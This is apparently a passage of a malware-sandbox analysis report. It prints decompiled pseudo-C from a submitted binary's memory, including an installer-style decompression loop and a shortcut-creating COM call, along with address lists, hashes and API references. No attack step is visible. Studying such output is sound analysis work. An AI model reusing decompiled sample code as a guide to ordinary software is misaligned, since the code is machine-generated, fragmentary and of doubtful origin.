                                                                                                                                                                                                                            										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                                                            										 *__esi = __dx;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            										L111:
                                                                                                                                                                                                                            										_t368 = __ebp - 0x48;
                                                                                                                                                                                                                            										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                                                                                                                            										__eflags =  *_t368;
                                                                                                                                                                                                                            										goto L112;
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										goto L109;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__ecx =  *(__ebp - 0xc);
                                                                                                                                                                                                                            								__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                                                                                            								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                                                            								 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                                                                                            									__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                                            									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                                                            									__ebx = __ebx | 0x00000001;
                                                                                                                                                                                                                            									__eflags = __ebx;
                                                                                                                                                                                                                            									 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            									L101:
                                                                                                                                                                                                                            									_t338 = __ebp - 0x48;
                                                                                                                                                                                                                            									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                                                            									__eflags =  *_t338;
                                                                                                                                                                                                                            									goto L102;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									goto L99;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__edx =  *(__ebp - 4);
                                                                                                                                                                                                                            							__eax = __eax - __ebx;
                                                                                                                                                                                                                            							 *(__ebp - 0x40) = __ecx;
                                                                                                                                                                                                                            							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                                                                                            							goto L108;
                                                                                                                                                                                                                            						case 0x1a:
                                                                                                                                                                                                                            							goto L55;
                                                                                                                                                                                                                            						case 0x1b:
                                                                                                                                                                                                                            							L75:
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                                                            							if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                                            								 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                                                                                            								goto L170;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                                                                                                                                                            0x00406fc2
                                                                                                                                                                                                                            0x00406fc2
                                                                                                                                                                                                                            0x00406fca
                                                                                                                                                                                                                            0x00406fcf
                                                                                                                                                                                                                            0x00406fd1
                                                                                                                                                                                                                            0x00406fd3
                                                                                                                                                                                                                            0x00406fd3
                                                                                                                                                                                                                            0x00406ff4
                                                                                                                                                                                                                            0x00406ff7
                                                                                                                                                                                                                            0x00406f9a
                                                                                                                                                                                                                            0x00406fa0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406ff9
                                                                                                                                                                                                                            0x00406f75
                                                                                                                                                                                                                            0x00406f79
                                                                                                                                                                                                                            0x00407581
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407581
                                                                                                                                                                                                                            0x00406f7f
                                                                                                                                                                                                                            0x00406f82
                                                                                                                                                                                                                            0x00406f85
                                                                                                                                                                                                                            0x00406f89
                                                                                                                                                                                                                            0x00406f8c
                                                                                                                                                                                                                            0x00406f92
                                                                                                                                                                                                                            0x00406f94
                                                                                                                                                                                                                            0x00406f94
                                                                                                                                                                                                                            0x00406f97
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406f97
                                                                                                                                                                                                                            0x00406db1
                                                                                                                                                                                                                            0x00406db1
                                                                                                                                                                                                                            0x00406db4
                                                                                                                                                                                                                            0x00406dba
                                                                                                                                                                                                                            0x00406dbc
                                                                                                                                                                                                                            0x00406dbc
                                                                                                                                                                                                                            0x00406dbf
                                                                                                                                                                                                                            0x00406dc2
                                                                                                                                                                                                                            0x00406dc4
                                                                                                                                                                                                                            0x00406dc5
                                                                                                                                                                                                                            0x00406dc8
                                                                                                                                                                                                                            0x00406e35
                                                                                                                                                                                                                            0x00406e35
                                                                                                                                                                                                                            0x00406e39
                                                                                                                                                                                                                            0x00406e3c
                                                                                                                                                                                                                            0x00406e3f
                                                                                                                                                                                                                            0x00406e42
                                                                                                                                                                                                                            0x00406e45
                                                                                                                                                                                                                            0x00406e46
                                                                                                                                                                                                                            0x00406e49
                                                                                                                                                                                                                            0x00406e4b
                                                                                                                                                                                                                            0x00406e51
                                                                                                                                                                                                                            0x00406e54
                                                                                                                                                                                                                            0x00406e57
                                                                                                                                                                                                                            0x00406e5a
                                                                                                                                                                                                                            0x00406e5d
                                                                                                                                                                                                                            0x00406e63
                                                                                                                                                                                                                            0x00406e7f
                                                                                                                                                                                                                            0x00406e82
                                                                                                                                                                                                                            0x00406e85
                                                                                                                                                                                                                            0x00406e88
                                                                                                                                                                                                                            0x00406e8f
                                                                                                                                                                                                                            0x00406e95
                                                                                                                                                                                                                            0x00406e99
                                                                                                                                                                                                                            0x00406e65
                                                                                                                                                                                                                            0x00406e65
                                                                                                                                                                                                                            0x00406e69
                                                                                                                                                                                                                            0x00406e71
                                                                                                                                                                                                                            0x00406e76
                                                                                                                                                                                                                            0x00406e78
                                                                                                                                                                                                                            0x00406e7a
                                                                                                                                                                                                                            0x00406e7a
                                                                                                                                                                                                                            0x00406ea3
                                                                                                                                                                                                                            0x00406ea6
                                                                                                                                                                                                                            0x00406e1d
                                                                                                                                                                                                                            0x00406e1d
                                                                                                                                                                                                                            0x00406e23
                                                                                                                                                                                                                            0x00406ed6
                                                                                                                                                                                                                            0x00406edc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406ede
                                                                                                                                                                                                                            0x00406ee1
                                                                                                                                                                                                                            0x00406ee4
                                                                                                                                                                                                                            0x00406ee7
                                                                                                                                                                                                                            0x00406eea
                                                                                                                                                                                                                            0x00406eed
                                                                                                                                                                                                                            0x00406ef0
                                                                                                                                                                                                                            0x00406ef3
                                                                                                                                                                                                                            0x00406ef6
                                                                                                                                                                                                                            0x00406efc
                                                                                                                                                                                                                            0x00406f14
                                                                                                                                                                                                                            0x00406f17
                                                                                                                                                                                                                            0x00406f1a
                                                                                                                                                                                                                            0x00406f1d
                                                                                                                                                                                                                            0x00406f1d
                                                                                                                                                                                                                            0x00406f20
                                                                                                                                                                                                                            0x00406f26
                                                                                                                                                                                                                            0x00406efe
                                                                                                                                                                                                                            0x00406efe
                                                                                                                                                                                                                            0x00406f06
                                                                                                                                                                                                                            0x00406f0b
                                                                                                                                                                                                                            0x00406f0d
                                                                                                                                                                                                                            0x00406f0f
                                                                                                                                                                                                                            0x00406f0f
                                                                                                                                                                                                                            0x00406f30
                                                                                                                                                                                                                            0x00406f33
                                                                                                                                                                                                                            0x00406eb1
                                                                                                                                                                                                                            0x00406eb5
                                                                                                                                                                                                                            0x00407575
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407575
                                                                                                                                                                                                                            0x00406ebb
                                                                                                                                                                                                                            0x00406ebe
                                                                                                                                                                                                                            0x00406ec1
                                                                                                                                                                                                                            0x00406ec5
                                                                                                                                                                                                                            0x00406ec8
                                                                                                                                                                                                                            0x00406ece
                                                                                                                                                                                                                            0x00406ed0
                                                                                                                                                                                                                            0x00406ed0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d39
                                                                                                                                                                                                                            0x00406d3f
                                                                                                                                                                                                                            0x00406d42
                                                                                                                                                                                                                            0x00406d4f
                                                                                                                                                                                                                            0x00406d57
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d0e
                                                                                                                                                                                                                            0x00406d0e
                                                                                                                                                                                                                            0x00406d12
                                                                                                                                                                                                                            0x0040755d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040755d
                                                                                                                                                                                                                            0x00406d1e
                                                                                                                                                                                                                            0x00406d29
                                                                                                                                                                                                                            0x00406d29
                                                                                                                                                                                                                            0x00406d29
                                                                                                                                                                                                                            0x00406d2c
                                                                                                                                                                                                                            0x00406d2f
                                                                                                                                                                                                                            0x00406d32
                                                                                                                                                                                                                            0x00406d37
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406ffe
                                                                                                                                                                                                                            0x00407002
                                                                                                                                                                                                                            0x00407020
                                                                                                                                                                                                                            0x00407023
                                                                                                                                                                                                                            0x0040702a
                                                                                                                                                                                                                            0x0040702d
                                                                                                                                                                                                                            0x00407030
                                                                                                                                                                                                                            0x00407033
                                                                                                                                                                                                                            0x00407036
                                                                                                                                                                                                                            0x00407039
                                                                                                                                                                                                                            0x0040703b
                                                                                                                                                                                                                            0x00407042
                                                                                                                                                                                                                            0x00407043
                                                                                                                                                                                                                            0x00407045
                                                                                                                                                                                                                            0x00407048
                                                                                                                                                                                                                            0x0040704b
                                                                                                                                                                                                                            0x0040704e
                                                                                                                                                                                                                            0x0040704e
                                                                                                                                                                                                                            0x00407053
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407053
                                                                                                                                                                                                                            0x00407004
                                                                                                                                                                                                                            0x00407007
                                                                                                                                                                                                                            0x0040700a
                                                                                                                                                                                                                            0x00407014
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407068
                                                                                                                                                                                                                            0x0040706c
                                                                                                                                                                                                                            0x0040708f
                                                                                                                                                                                                                            0x00407092
                                                                                                                                                                                                                            0x00407095
                                                                                                                                                                                                                            0x0040709f
                                                                                                                                                                                                                            0x0040706e
                                                                                                                                                                                                                            0x0040706e
                                                                                                                                                                                                                            0x00407071
                                                                                                                                                                                                                            0x00407074
                                                                                                                                                                                                                            0x00407077
                                                                                                                                                                                                                            0x00407084
                                                                                                                                                                                                                            0x00407087
                                                                                                                                                                                                                            0x00407087
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004070ab
                                                                                                                                                                                                                            0x004070af
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004070b5
                                                                                                                                                                                                                            0x004070b9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004070bf
                                                                                                                                                                                                                            0x004070c1
                                                                                                                                                                                                                            0x004070c5
                                                                                                                                                                                                                            0x004070c5
                                                                                                                                                                                                                            0x004070c8
                                                                                                                                                                                                                            0x004070cc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040711c
                                                                                                                                                                                                                            0x00407120
                                                                                                                                                                                                                            0x00407127
                                                                                                                                                                                                                            0x0040712a
                                                                                                                                                                                                                            0x0040712d
                                                                                                                                                                                                                            0x00407137
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407137
                                                                                                                                                                                                                            0x00407122
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407143
                                                                                                                                                                                                                            0x00407147
                                                                                                                                                                                                                            0x0040714e
                                                                                                                                                                                                                            0x00407151
                                                                                                                                                                                                                            0x00407154
                                                                                                                                                                                                                            0x00407149
                                                                                                                                                                                                                            0x00407149
                                                                                                                                                                                                                            0x00407149
                                                                                                                                                                                                                            0x00407157
                                                                                                                                                                                                                            0x0040715a
                                                                                                                                                                                                                            0x0040715d
                                                                                                                                                                                                                            0x0040715d
                                                                                                                                                                                                                            0x00407160
                                                                                                                                                                                                                            0x00407163
                                                                                                                                                                                                                            0x00407166
                                                                                                                                                                                                                            0x00407166
                                                                                                                                                                                                                            0x00407169
                                                                                                                                                                                                                            0x00407170
                                                                                                                                                                                                                            0x00407175
                                                                                                                                                                                                                            0x004074e8
                                                                                                                                                                                                                            0x004074eb
                                                                                                                                                                                                                            0x004074ee
                                                                                                                                                                                                                            0x00407507
                                                                                                                                                                                                                            0x0040750a
                                                                                                                                                                                                                            0x0040750d
                                                                                                                                                                                                                            0x00407510
                                                                                                                                                                                                                            0x00407514
                                                                                                                                                                                                                            0x00407516
                                                                                                                                                                                                                            0x00407516
                                                                                                                                                                                                                            0x00407517
                                                                                                                                                                                                                            0x0040751a
                                                                                                                                                                                                                            0x004074f0
                                                                                                                                                                                                                            0x004074f0
                                                                                                                                                                                                                            0x004074f8
                                                                                                                                                                                                                            0x004074fd
                                                                                                                                                                                                                            0x004074ff
                                                                                                                                                                                                                            0x00407502
                                                                                                                                                                                                                            0x00407502
                                                                                                                                                                                                                            0x0040751d
                                                                                                                                                                                                                            0x00407524
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407526
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407526
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004071c2
                                                                                                                                                                                                                            0x004071c5
                                                                                                                                                                                                                            0x004071fb
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x00407331
                                                                                                                                                                                                                            0x00407333
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00407339
                                                                                                                                                                                                                            0x0040733c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407342
                                                                                                                                                                                                                            0x00407346
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x004071c7
                                                                                                                                                                                                                            0x004071c9
                                                                                                                                                                                                                            0x004071cb
                                                                                                                                                                                                                            0x004071cd
                                                                                                                                                                                                                            0x004071d0
                                                                                                                                                                                                                            0x004071d1
                                                                                                                                                                                                                            0x004071d3
                                                                                                                                                                                                                            0x004071d5
                                                                                                                                                                                                                            0x004071d8
                                                                                                                                                                                                                            0x004071db
                                                                                                                                                                                                                            0x004071f1
                                                                                                                                                                                                                            0x004071f6
                                                                                                                                                                                                                            0x0040722e
                                                                                                                                                                                                                            0x0040722e
                                                                                                                                                                                                                            0x00407232
                                                                                                                                                                                                                            0x0040725e
                                                                                                                                                                                                                            0x00407260
                                                                                                                                                                                                                            0x00407267
                                                                                                                                                                                                                            0x0040726a
                                                                                                                                                                                                                            0x0040726d
                                                                                                                                                                                                                            0x0040726d
                                                                                                                                                                                                                            0x00407272
                                                                                                                                                                                                                            0x00407272
                                                                                                                                                                                                                            0x00407274
                                                                                                                                                                                                                            0x00407277
                                                                                                                                                                                                                            0x0040727e
                                                                                                                                                                                                                            0x00407281
                                                                                                                                                                                                                            0x004072ae
                                                                                                                                                                                                                            0x004072ae
                                                                                                                                                                                                                            0x004072b1
                                                                                                                                                                                                                            0x004072b4
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x004072b6
                                                                                                                                                                                                                            0x004072bc
                                                                                                                                                                                                                            0x004072bf
                                                                                                                                                                                                                            0x004072c2
                                                                                                                                                                                                                            0x004072c5
                                                                                                                                                                                                                            0x004072c8
                                                                                                                                                                                                                            0x004072cb
                                                                                                                                                                                                                            0x004072ce
                                                                                                                                                                                                                            0x004072d1
                                                                                                                                                                                                                            0x004072d4
                                                                                                                                                                                                                            0x004072d7
                                                                                                                                                                                                                            0x004072f0
                                                                                                                                                                                                                            0x004072f2
                                                                                                                                                                                                                            0x004072f5
                                                                                                                                                                                                                            0x004072f6
                                                                                                                                                                                                                            0x004072f9
                                                                                                                                                                                                                            0x004072fb
                                                                                                                                                                                                                            0x004072fe
                                                                                                                                                                                                                            0x00407300
                                                                                                                                                                                                                            0x00407302
                                                                                                                                                                                                                            0x00407305
                                                                                                                                                                                                                            0x00407307
                                                                                                                                                                                                                            0x0040730a
                                                                                                                                                                                                                            0x0040730e
                                                                                                                                                                                                                            0x00407310
                                                                                                                                                                                                                            0x00407310
                                                                                                                                                                                                                            0x00407311
                                                                                                                                                                                                                            0x00407314
                                                                                                                                                                                                                            0x00407317
                                                                                                                                                                                                                            0x004072d9
                                                                                                                                                                                                                            0x004072d9
                                                                                                                                                                                                                            0x004072e1
                                                                                                                                                                                                                            0x004072e6
                                                                                                                                                                                                                            0x004072e8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                                                                                                                                                            • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                                                            			E004021AA(void* __eflags) {
                                                                                                                                                                                                                            				signed int _t52;
                                                                                                                                                                                                                            				void* _t56;
                                                                                                                                                                                                                            				intOrPtr* _t60;
                                                                                                                                                                                                                            				intOrPtr _t61;
                                                                                                                                                                                                                            				intOrPtr* _t62;
                                                                                                                                                                                                                            				intOrPtr* _t64;
                                                                                                                                                                                                                            				intOrPtr* _t66;
                                                                                                                                                                                                                            				intOrPtr* _t68;
                                                                                                                                                                                                                            				intOrPtr* _t70;
                                                                                                                                                                                                                            				intOrPtr* _t72;
                                                                                                                                                                                                                            				intOrPtr* _t74;
                                                                                                                                                                                                                            				intOrPtr* _t76;
                                                                                                                                                                                                                            				intOrPtr* _t78;
                                                                                                                                                                                                                            				intOrPtr* _t80;
                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                            				intOrPtr* _t91;
                                                                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                                                                            				signed int _t105;
                                                                                                                                                                                                                            				void* _t107;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                                                                                                                                                                                            				_t52 =  *(_t107 - 0x20);
                                                                                                                                                                                                                            				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                                                                                                                                                                                            				_t101 = _t52 & 0x00008000;
                                                                                                                                                                                                                            				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                                                                                                                                                                                            				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                                                                                                                                                                                            				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                                                                                                                                                                                            					E00402DA6(0x21);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t56 = _t107 + 8;
                                                                                                                                                                                                                            				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56); // executed
                                                                                                                                                                                                                            				if(_t56 < _t83) {
                                                                                                                                                                                                                            					L14:
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                                                                                                                                                                                            					_push(0xfffffff0);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                                                                                                                            					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                                                                                                                                                                                            					if(_t61 >= _t83) {
                                                                                                                                                                                                                            						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                                                                                                                                                                                            						if(_t101 == _t83) {
                                                                                                                                                                                                                            							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\hardz\\AppData\\Local\\Temp");
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(_t105 != _t83) {
                                                                                                                                                                                                                            							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                                                                                                                                                                                            						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                                                                                                                                                                                            						if( *_t91 != _t83) {
                                                                                                                                                                                                                            							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                                                                                                                                                                                            						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                                                                                                                                                                            							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                                                                                                                                                                            						_push(0xfffffff4);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E00401423();
                                                                                                                                                                                                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                            0x004022e6
                                                                                                                                                                                                                            0x004022f1
                                                                                                                                                                                                                            0x00402c2d
                                                                                                                                                                                                                            0x00402c39

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
